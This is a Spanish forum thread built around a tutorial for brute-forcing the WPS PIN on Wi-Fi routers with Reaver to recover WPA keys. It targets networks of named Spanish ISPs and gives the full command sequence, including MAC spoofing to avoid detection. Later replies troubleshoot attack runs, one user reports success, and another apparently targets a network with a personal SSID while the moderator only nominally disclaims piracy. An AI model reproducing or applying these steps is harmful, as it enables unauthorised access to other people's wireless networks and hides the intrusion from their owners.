TUTORIAL Reaver (WPA) (Wifiway 3.4)

Contribuciones por
Warcry
zape000
gorilla.maguila

Primer paso
Para evitar perder el tiempo es indispensable determinar si la red a auditar tiene activado WPS, y que sea una de estas:

WLAN_xxxx
FTE-xxxx
Oñoxxxx
Vodafonexxxx (MAC empieza por 62:C7...)

*******************

Antiguamente se podía hacer con Walsh pero este ya no es el caso. De todas formas indicamos las instrucciones por si alguien les puede sacar provecho

1) Desde la consola poner la tarjeta de red en modo monitor
#airmon-ng start wlan0

2) Ejecutar walsh
# walsh -i mon0 -C

*******************

En vista de que Walsh ya no funciona el forista gorilla.maguila propuso el siguiente metodo efectivo

1) Desde la consola poner la tarjeta de red en modo monitor
# airmon-ng start wlan0

2) Abrimos el wireshark.

-> Menu Capture
->Options

Elegimos interfaz mon0 (o la que nos haya dado el airmon).

3) Nos aseguramos que no esté seleccionada la opción: "Capture packets in promiscuous mode"

4) Le damos a Start para comenzar la captura de paquetes.

5) Para ver si tiene el WPS activado miramos en los paquetes broadcast la información que se encuentra en:

->IEEE 802.11 wireless LAN management frame
->Tagged parameters:
-> Tag: Vendor Specific: Microsoft WPS



*******************

Si la red tiene WPS se puede proceder a utilizar Reaver

1) Dado que los ataques WPS son detectables, indispensable cambiar la MAC, no es necesario si no se quiere.
# macchanger -m 00:11:22:33:44:55 mon0

2) Buscar el AP deseado y anotar su BSSID correspondiente
# airodump-ng mon0

3) Se ejecuta Reaver de esta manera
# reaver -i mon0 -b 00:11:22:33:44:56

Para ver detalles sobre el proceso añadir el switch -vv (Esta preferible esta para ver más detalles)
# reaver -i mon0 -b 00:11:22:33:44:56 -vv

Para cambiar el intervalo entre pins se usa el switch -d segundos. 0 Corresponde a desactivado.
# reaver -i mon0 -b 00:11:22:33:44:56 -vv -d 1

*******************

Cabe anotar que aunque el Router tenga el boton fisico de WPS instalado, el modo no necesariamente esta habilitado internamente. Segun el manual Reaver no funciona con todos los Routers, y algunos pueden simplemente bloquearse ante el ataque.


Sí os surgen problemas, no dudeis en exponerlas aquí. Se intentaran resolver en la medida de lo posible.


Fuente: Simanji (SeguridadWireless)

Nadie tiene dudas?

Estamos recibiendo muchas visitas a este hilo, pero ningún comentario. Estaría bien que compartierais vuestras experiencias, dudas, impresiones, sobre el uso y funcionamiento de reaver.

Saludos

yo he probado tal como tu lo indicas y me sale esto

0.00% complete
WPS transaction failed, re-trying last pin
EAPOL START request
[!] WARNING: Receive timeout occurred
Sending EAPOL START request

esta bien espero a que me de la clave o algo va mal
si utuvuiese mal que deberia poner
gracias un saludo

El porcentaje tiene que avanzar, tienes que darle tiempo, suele tardar entre 3 y 12 horas. De todos modos, tienes que darnos detalles, tales como:

-Compañía que suministra la red
- ¿Has comprobado si tiene el WPS activo con Wireshark?

Saludos

si sale Tag: Vendor Specific: Microsoft WPS
dare mas detalles gracias por tu respuesta

Tienes que tener en cuenta, que de momento para las vodafonexxxx y orangexxxx, no funciona este método. Según se comenta, se puede hacer con:
WLAN_xxxx
FTE-xxxx
Oñoxxxx

Saludos

he probado con una FTE-xxxx ha llegado al 100% y nada quizas hice algo mal volvere a probar gracia por tu ayuda

No se que comando usas, pero te recomiendo este, te da mas detalles:

reaver -i mon0 -b 00:11:22:33:44:56 -vv

Saludos

frucal escribió:he probado con una FTE-xxxx ha llegado al 100% y nada quizas hice algo mal volvere a probar gracia por tu ayuda

Al final, has podido avanzar algo con tu FTE?

Saludos

no me da problemas de timout o algo de eso

ahora si perfecto pero puse el comando reaver -i mon0 -b XXXXXXXXXXX
y le di a entrar da menos datos pero la pilla empeso

0.00 %
0.005%
0.009%
hasta que aparecio

gracias muchas gracias

Me alegro que te haya funcionado!!

Saludos

nueva duda tengo selesionado una wpa con wps activo todo bien
pero la ssid esta cambiada por ejemplo ssid:juanperez
mac.XXXXXXXX el wps todo ok cuando hago reaver empiesa bien pero fallla
en el 0.97% sabes algo de esto

Tienes que saber que no damos soporte a la pirateria, pero suponemos que son tus routers y estas probando su vulnerabilidad, así que averigua de que compañia es ese router y si es de las que que te comenté antes, tiene que funcionar, aunque como ya comprobaste no siempre a la primera funciona!!

Saludos